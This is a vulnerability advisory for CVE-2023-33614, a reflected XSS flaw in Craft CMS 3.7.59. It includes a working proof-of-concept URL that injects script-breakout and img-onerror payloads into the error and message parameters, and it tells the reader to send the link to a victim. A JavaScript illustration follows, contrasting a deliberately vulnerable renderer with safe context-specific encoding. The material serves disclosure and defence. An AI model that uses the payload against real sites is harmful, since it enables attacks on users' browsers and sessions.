[CVE-2023-33614] Reflected - Cross Site Script (XSS)

Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services

Vendor of Product: CraftCMS

Affected Product Code Base: 3.7.59

CVE: CVE-2023-33614

Description: Craft CMS version 3.7.59 is vulnerable to a reflected cross-site scripting (XSS) vulnerability that allows a remote, unauthenticated attacker to execute JavaScript code in a victim's browser via the error and message parameters.

Steps to reproduce:

  • Send the URL below to the victim; when the user clicks the link, the XSS payload is executed.

http://localhost/craftcms/web/admin/plugin-store/callback?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E&message=message%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E
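The URL above places a closing script tag inside the error and message values, which only works if the page reflects those parameters into an inline script block without encoding them. The following is an added illustration, not Craft CMS's own code: it parses the two parameters out of a constructed request URL, renders them the naive way (escaping only double quotes) and the safe way (JSON-encoding plus escaping of the characters the HTML parser acts on inside a script element), and counts closing script tags so the breakout is visible. The function names and the rendered page fragment are hypothetical.

```javascript
// Added illustration (not Craft CMS's own code): why reflecting the "error"
// and "message" query parameters into an inline <script> block is dangerous,
// and how to encode them so the reflected value can never leave the string.
// renderVulnerable / renderSafe / countScriptClosers are hypothetical names.

// Constructed sample request, modelled on the advisory's reproduce step.
const SAMPLE_URL =
  "http://localhost/craftcms/web/admin/plugin-store/callback" +
  "?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(1)%3E&message=ok";

// Pull the two reflected parameters out of the request URL.
function parseCallbackParams(rawUrl) {
  const { searchParams } = new URL(rawUrl);
  return {
    error: searchParams.get("error") || "",
    message: searchParams.get("message") || "",
  };
}

// Naive rendering: only double quotes are escaped, so a value containing
// "</script>" ends the script element and the remainder is parsed as HTML,
// where <img src=x onerror=...> runs the attacker's code.
function renderVulnerable({ error, message }) {
  const q = (s) => s.replace(/"/g, '\\"');
  return `<script>window.callbackState = {error: "${q(error)}", ` +
         `message: "${q(message)}"};</script>`;
}

// Safe JS literal: JSON-encode, then escape the characters that the HTML
// parser (which runs before the JS parser) could interpret inside <script>.
// The browser still decodes \u003c back to "<" when it evaluates the literal.
function safeJsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe({ error, message }) {
  return `<script>window.callbackState = {error: ${safeJsLiteral(error)}, ` +
         `message: ${safeJsLiteral(message)}};</script>`;
}

// Detection-style check for a response body: this fragment should contain
// exactly one closing </script>. A second one means user input broke out.
function countScriptClosers(html) {
  return (html.match(/<\/script>/gi) || []).length;
}

const params = parseCallbackParams(SAMPLE_URL);
console.log("vulnerable render, closing tags:", countScriptClosers(renderVulnerable(params)));
console.log("safe render, closing tags:      ", countScriptClosers(renderSafe(params)));
```

The fix is context-specific: a value dropped into a script block needs JavaScript-string encoding with the angle brackets escaped as above, and the same value dropped into the HTML body would instead need HTML entity encoding. Escaping quotes alone, as the vulnerable renderer does, never addresses the script-element boundary that the advisory's payload abuses.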